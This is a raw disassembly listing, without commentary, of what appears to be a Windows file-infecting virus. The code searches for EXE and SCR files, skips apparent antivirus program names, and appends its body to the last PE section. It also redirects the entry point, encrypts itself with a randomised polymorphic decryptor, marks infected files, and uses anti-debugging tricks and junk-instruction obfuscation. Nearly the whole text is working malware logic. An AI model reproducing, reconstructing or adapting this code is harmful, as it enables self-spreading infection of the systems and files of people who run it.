call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3151589F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3151589F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3151589F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_31515877
mov [ebp+1042B4h], eax
locret_3151532A: ; CODE XREF: sub_31515259+10�j
; sub_31515259+27�j ...
retn
sub_31515259 endp
; ---------------------------------------------------------------------------
loc_3151532B: ; CODE XREF: sub_3151545B+188�p
; sub_3151545B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_31515370 proc near ; CODE XREF: sub_3151545B:loc_315154D0�p
; sub_3151545B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_31515375: ; CODE XREF: sub_31515370+23�j
jecxz short locret_315153AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_315153AC
cmp dword ptr [edx+0Ch], 1
jb short loc_31515375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_315153AC: ; CODE XREF: sub_31515370:loc_31515375�j
; sub_31515370+1D�j ...
retn
sub_31515370 endp
; =============== S U B R O U T I N E =======================================
sub_315153AD proc near ; CODE XREF: UPX2:31515445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_315153AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_315153BA: ; CODE XREF: UPX2:315153DB�j
mov ecx, edi
jmp short loc_315153C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_315153C5: ; CODE XREF: UPX2:315153D7�j
mov ebx, edi
xor ecx, ecx
loc_315153C9: ; CODE XREF: UPX2:315153BC�j
; UPX2:315153DF�j
lodsb
cmp al, 61h
jb short loc_315153D4
cmp al, 7Ah
ja short loc_315153D4
sub al, 20h
loc_315153D4: ; CODE XREF: UPX2:315153CC�j
; UPX2:315153D0�j
stosb
cmp al, 5Ch
jz short loc_315153C5
cmp al, 2Eh
jz short loc_315153BA
cmp al, 0
jnz short loc_315153C9
jecxz short locret_315153AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_315153F7
cmp eax, 524353h
jnz locret_3151532A
loc_315153F7: ; CODE XREF: UPX2:315153EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3151532A
cmp eax, 4E554357h
jz locret_3151532A
cmp eax, 32334357h
jz locret_3151532A
cmp eax, 4F545350h
jz locret_3151532A
xor ebx, ebx
call sub_31515259
jnz short loc_3151543E
call sub_3151512D
call sub_31515259
jz locret_3151532A
loc_3151543E: ; CODE XREF: UPX2:3151542C�j
xor edx, edx
call sub_3151545B
call sub_315153AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_31515855
; =============== S U B R O U T I N E =======================================
sub_3151545B proc near ; CODE XREF: UPX2:31515440�p
var_1C = dword ptr -1Ch
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_31515855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_31515855
test dword ptr [ebx+16h], 2000h
jnz loc_31515855
test byte ptr [ebx+5Ch], 2
jz loc_31515855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_31515855
cmp eax, 20202020h
jz loc_31515855
mov ecx, [ebx+0C8h]
jecxz short loc_315154D0
push ecx
call near ptr dword_31514410+4
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_315154D0: ; CODE XREF: sub_3151545B+5D�j
call sub_31515370
jb loc_31515855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_315154F0
xor eax, eax
jmp short loc_315154F5
; ---------------------------------------------------------------------------
loc_315154F0: ; CODE XREF: sub_3151545B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_315154F5: ; CODE XREF: sub_3151545B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_31513B50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_31515517: ; CODE XREF: sub_3151545B+D5�j
push 20h
dec cl
pop eax
js short loc_31515532
call near ptr dword_31513B50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_31515517
; ---------------------------------------------------------------------------
loc_31515532: ; CODE XREF: sub_3151545B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_31515560
test dword ptr [ebp+1039C0h], 3
jnz short loc_31515556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_31515560
; ---------------------------------------------------------------------------
loc_31515556: ; CODE XREF: sub_3151545B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_31515560: ; CODE XREF: sub_3151545B+E1�j
; sub_3151545B+F9�j ...
push 6
pop ecx
loc_31515566: ; CODE XREF: sub_3151545B+129�j
push 6
pop eax
call near ptr dword_31513B50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_31515566
test dword ptr [ebp+1039C0h], 8
jnz short loc_3151559B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_31515560
loc_3151559B: ; CODE XREF: sub_3151545B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_315155C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_31515560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_31515560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_31515560
loc_315155C2: ; CODE XREF: sub_3151545B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_315155D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_31515560
loc_315155D7: ; CODE XREF: sub_3151545B+171�j
and dword ptr [ebp+104300h], 0
call loc_31514855
call loc_3151532B
call sub_3151585E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_31515259
jz loc_31515855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_31515370
jb loc_31515855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3151564B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3151564B: ; CODE XREF: sub_3151545B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3151565F
rep movsb
loc_3151565F: ; CODE XREF: sub_3151545B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_3151571D
push dword ptr [ebx+28h]
call near ptr dword_31514410+4
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_3151571D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3151569C
xor ecx, ecx
loc_3151569C: ; CODE XREF: sub_3151545B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_31515703
mov edi, [esp+1Ch+var_1C]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_315156DC
neg dword ptr [eax]
loc_315156DC: ; CODE XREF: sub_3151545B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_315156FA
neg dword ptr [eax]
loc_315156FA: ; CODE XREF: sub_3151545B+29B�j
push ecx
call loc_3151532B
pop ecx
jmp short loc_3151570F
; ---------------------------------------------------------------------------
loc_31515703: ; CODE XREF: sub_3151545B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3151570F: ; CODE XREF: sub_3151545B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_3151571D: ; CODE XREF: sub_3151545B+20E�j
; sub_3151545B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_31515736
imul edx, 12345678h
loc_31515736: ; CODE XREF: sub_3151545B+2D3�j
mov [eax-19h], dx
call sub_31513120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_31515768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_31515768: ; CODE XREF: sub_3151545B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_31515784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_31515784: ; CODE XREF: sub_3151545B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31515797
push edx
call sub_31514EF1
pop edx
loc_31515797: ; CODE XREF: sub_3151545B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_315157A4
mov [ebx+28h], ecx
jmp short loc_315157B1
; ---------------------------------------------------------------------------
loc_315157A4: ; CODE XREF: sub_3151545B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_315157AE
jmp short loc_315157B1
; ---------------------------------------------------------------------------
loc_315157AE: ; CODE XREF: sub_3151545B+34F�j
mov ecx, [ebx+28h]
loc_315157B1: ; CODE XREF: sub_3151545B+347�j
; sub_3151545B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_315157D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_315157D1: ; CODE XREF: sub_3151545B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_315157E2
mov [edx+8], ecx
loc_315157E2: ; CODE XREF: sub_3151545B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_31515813
add ecx, [ebp+101069h]
loc_31515813: ; CODE XREF: sub_3151545B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_31515835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_31515835
mov dh, [ebp+1039BFh]
loc_31515835: ; CODE XREF: sub_3151545B+3C4�j
; sub_3151545B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_3151584C
loc_31515841: ; CODE XREF: sub_3151545B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_31515841
jmp short loc_31515855
; ---------------------------------------------------------------------------
loc_3151584C: ; CODE XREF: sub_3151545B+3E4�j
; sub_3151545B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3151584C
loc_31515855: ; CODE XREF: UPX2:31515456�j
; sub_3151545B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3151545B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3151585E proc near ; CODE XREF: sub_3151545B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_3151532A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_31515877: ; CODE XREF: sub_31515259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3151589F: ; CODE XREF: sub_31515259+6B�j
; sub_31515259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_315158AB: ; CODE XREF: sub_31515259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_3151585E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2070306h, 7AAA0105h
dd 0FF286EE3h, 119415FFh, 0FF8B0100h
db 90h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_315159F2
mov ebx, ebx
clc
cmc
call sub_31515AB5
jmp short $+2
xchg ebx, ebx
stc
mov ebp, 0F8F880B1h
stc
clc
mov ebx, ebx
cld
jmp loc_31515A48
; =============== S U B R O U T I N E =======================================
sub_315159F2 proc near ; CODE XREF: UPX2:315159D0�p
push dword ptr fs:0
mov ds:dword_31509218, ebp
mov ecx, ecx
nop
mov fs:0, esp
xor ecx, ecx
push 80000000h
push ecx
push 20h
push 1
push ecx
push 40h
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
call ds:dword_31509090 ; GetProcAddress
xor ebx, ebx
push 1
push ebx
push ebx
push ebx
push ebx
push 80h
push ebx
push ebx
push 4000h
call ds:dword_31509090 ; GetProcAddress
loc_31515A48: ; CODE XREF: UPX2:315159ED�j
xchg ebx, ebx
mov edx, [ebp-8]
mov fs:0, edx
clc
sub edx, edx
sub ecx, ecx
cld
cld
stc
cmc
mov cl, 0AEh
xchg ebx, ebx
clc
cld
loc_31515A62: ; CODE XREF: sub_315159F2+77�j
lea edx, [edx+1]
jmp short $+2
xchg ebx, ebx
loop loc_31515A62
cld
cld
call sub_31515AAE
jmp short $+2
clc
sub edi, 0FFFFE2A6h
xor esi, esi
xor esi, 2AC5h
cmc
xchg ebx, ebx
push edi
mov eax, eax
cmc
loc_31515A8A: ; CODE XREF: sub_315159F2+A7�j
call sub_31515AA1
nop
nop
inc edi
dec esi
cmc
mov edx, edx
cmp esi, 0
jnz short loc_31515A8A
pop edi
stc
leave
jmp edi
sub_315159F2 endp
; ---------------------------------------------------------------------------
stc
; =============== S U B R O U T I N E =======================================
sub_31515AA1 proc near ; CODE XREF: sub_315159F2:loc_31515A8A�p
xchg al, [edi]
cld
xor ax, dx
stc
xchg al, [edi]
xchg ebx, ebx
retn
sub_31515AA1 endp
; ---------------------------------------------------------------------------
cmc
; =============== S U B R O U T I N E =======================================
sub_31515AAE proc near ; CODE XREF: sub_315159F2+7B�p
pop edi
jmp edi
sub_31515AAE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
jmp short $+2
nop
; =============== S U B R O U T I N E =======================================
sub_31515AB5 proc near ; CODE XREF: UPX2:315159D9�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_31515AB5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0EBF9h
dd 0E7h dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 1464h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
cld
push ebp
mov ebp, esp
call sub_3151B020
stc
cld
call sub_3151B0F4
clc
jmp short $+2
mov ebp, 12FFC0h ; DATA XREF: sub_3151B020+C�w
cmc
clc
nop
jmp loc_3151B07B
start endp
; =============== S U B R O U T I N E =======================================
sub_3151B020 proc near ; CODE XREF: start+4�p
push dword ptr fs:0
mov fs:0, esp
mov dword ptr ds:loc_3151B013+1, ebp
nop
xor ebx, ebx
push ebx
push ebx
push 80000000h
push 8000h
push 80000000h
push 800h
push ebx
push ebx
push ebx
push 80000000h
push 80000000h
call ds:dword_31509090 ; GetProcAddress
xor ecx, ecx
push ecx
push 1
push ecx
push ecx
push ecx
push 100h
push 40h
push ecx
push ecx
call ds:dword_31509090 ; GetProcAddress
loc_3151B07B: ; CODE XREF: start+1B�j
stc
stc
mov esi, [ebp-8]
mov fs:0, esi
jmp short $+2
cmc
jmp short $+2
jmp short $+2
xchg ebx, ebx
sub esi, esi
sub ecx, ecx
stc
cmc
mov cl, 16h
loc_3151B097: ; CODE XREF: sub_3151B020+7F�j
lea esi, [esi+1]
xchg ebx, ebx
clc
clc
stc
loop loc_3151B097
cmc
call sub_3151B0ED
clc
sub ebx, 0FFFFFFA3h
xor ecx, ecx
xor ecx, 29CCh
nop
push ebx
jmp short $+2
jmp short $+2
loc_3151B0BC: ; CODE XREF: sub_3151B020+AA�j
call sub_3151B0D8
xchg ebx, ebx
jmp short $+2
inc ebx
dec ecx
cmp ecx, 0
jnz short loc_3151B0BC
pop ebx
stc
nop
leave
mov eax, eax
nop
mov ebx, ebx
jmp ebx
sub_3151B020 endp
; ---------------------------------------------------------------------------
cmc
; =============== S U B R O U T I N E =======================================
sub_3151B0D8 proc near ; CODE XREF: sub_3151B020:loc_3151B0BC�p
mov al, [ebx]
xchg ebx, ebx
stc
cld
xor ax, si
cmc
xchg al, [ebx]
clc
mov edx, edx
clc
jmp short $+2
retn
sub_3151B0D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_3151B0ED proc near ; CODE XREF: sub_3151B020+82�p
pop ebx
jmp short $+2
mov eax, eax
jmp ebx
sub_3151B0ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3151B0F4 proc near ; CODE XREF: start+B�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3151B0F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_3151B104 proc near ; DATA XREF: UPX2:3151E40C�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 3151B23B SIZE 00000047 BYTES
call $+5
cld
mov eax, [esp+4+var_4]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_3151B151
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_3151B145
mov ebx, [eax+29C1h]
jmp short loc_3151B14F
; ---------------------------------------------------------------------------
loc_3151B145: ; CODE XREF: sub_3151B104+37�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_3151B14F: ; CODE XREF: sub_3151B104+3F�j
mov ebx, [ebx]
loc_3151B151: ; CODE XREF: sub_3151B104+1F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 11F09h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3151B17F
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3151B17F: ; CODE XREF: sub_3151B104+74�j
and ebx, 0FFFFF000h
loc_3151B185: ; CODE XREF: sub_3151B104+90�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3151B196
loc_3151B18E: ; CODE XREF: sub_3151B104+9F�j
sub ebx, 100h
jnz short loc_3151B185
loc_3151B196: ; CODE XREF: sub_3151B104+88�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3151B18E
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3151B1B0: ; CODE XREF: sub_3151B104:loc_3151B1C4�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3151B1C4
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3151B1C9
loc_3151B1C4: ; CODE XREF: sub_3151B104+B5�j
loop loc_3151B1B0
pop ecx
jmp short loc_3151B1F4
; ---------------------------------------------------------------------------
loc_3151B1C9: ; CODE XREF: sub_3151B104+BE�j
sub [esp+8+var_8], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3151B23B
sub_3151B104 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151B282
loc_3151B1F4: ; CODE XREF: sub_3151B104+C3�j
; sub_3151B282+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_3151B220
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_3151B220: ; CODE XREF: sub_3151B282-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3151B282
; ---------------------------------------------------------------------------
and al, 0C0h
; =============== S U B R O U T I N E =======================================
sub_3151B224 proc near ; CODE XREF: sub_3151D55F+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_3151B22C: ; CODE XREF: sub_3151B224+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3151B22C
pop ebx
retn
sub_3151B224 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151B104
loc_3151B23B: ; CODE XREF: sub_3151B104+EE�j
call near ptr loc_3151B24A+2
inc ebx
insb
outsd
jnb short near ptr loc_3151B2A7+3
dec eax
popa
outsb
db 64h
insb
loc_3151B24A: ; CODE XREF: sub_3151B104:loc_3151B23B�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_3151B266+1
inc ebx
jb short loc_3151B2C2
popa
jz short near ptr loc_3151B2C4+1
inc ebp
jbe short near ptr loc_3151B2C4+4
outsb
jz short loc_3151B2A7
loc_3151B266: ; CODE XREF: sub_3151B104+151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3151B282
inc edi
db 65h
jz short near ptr loc_3151B2C4+1
popa
jnb short near ptr loc_3151B2EE+2
inc ebp
jb short near ptr loc_3151B2EE+3
outsd
jb short $+2
; END OF FUNCTION CHUNK FOR sub_3151B104
; =============== S U B R O U T I N E =======================================
sub_3151B282 proc near ; CODE XREF: sub_3151B104+16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 3151B1F4 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3151B638 SIZE 0000000B BYTES
push ebx
call esi ; rand
mov [ebp+103E6Ah], eax
call sub_3151B663
test eax, eax
jz loc_3151B1F4
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_3151B638
loc_3151B2A7: ; CODE XREF: sub_3151B104+160�j
; sub_3151B104+13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_3151B2C4
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_3151B2C2: ; CODE XREF: sub_3151B104+157�j
jmp short loc_3151B2CB
; ---------------------------------------------------------------------------
loc_3151B2C4: ; CODE XREF: sub_3151B282+2C�j
; sub_3151B104+15A�j ...
and dword ptr [ebp+101598h], 0
loc_3151B2CB: ; CODE XREF: sub_3151B282:loc_3151B2C2�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_3151B2EE: ; CODE XREF: sub_3151B104+176�j
; sub_3151B104+179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3151B6A0
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_3151B3E7
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_3151B638
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_3151B638
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3151B638
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_3151B3D7
jmp loc_3151B638
; ---------------------------------------------------------------------------
loc_3151B3D7: ; CODE XREF: sub_3151B282+14B�p
; sub_3151B282+162�j
push 1
pop ecx
jecxz short locret_3151B3E6
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_3151B3D7
; ---------------------------------------------------------------------------
locret_3151B3E6: ; CODE XREF: sub_3151B282+158�j
retn
; ---------------------------------------------------------------------------
loc_3151B3E7: ; CODE XREF: sub_3151B282+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_3151B638
call near ptr loc_3151B3FE+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3151B3FE: ; CODE XREF: sub_3151B282+172�p
add bh, bh
sub_3151B282 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3151B6A0
cmp dword ptr [ebp+103F2Eh], 0
jz loc_3151B638
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_3151B638
mov ecx, [ebp+103F06h]
jecxz short loc_3151B487
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_3151B487
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_3151B487: ; CODE XREF: UPX2:3151B46B�j
; UPX2:3151B47C�j
call sub_3151B644
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_3151B4D0: ; CODE XREF: UPX2:3151B4D9�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_3151B4D0
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_3151B638
lea esi, [ebp+101000h]
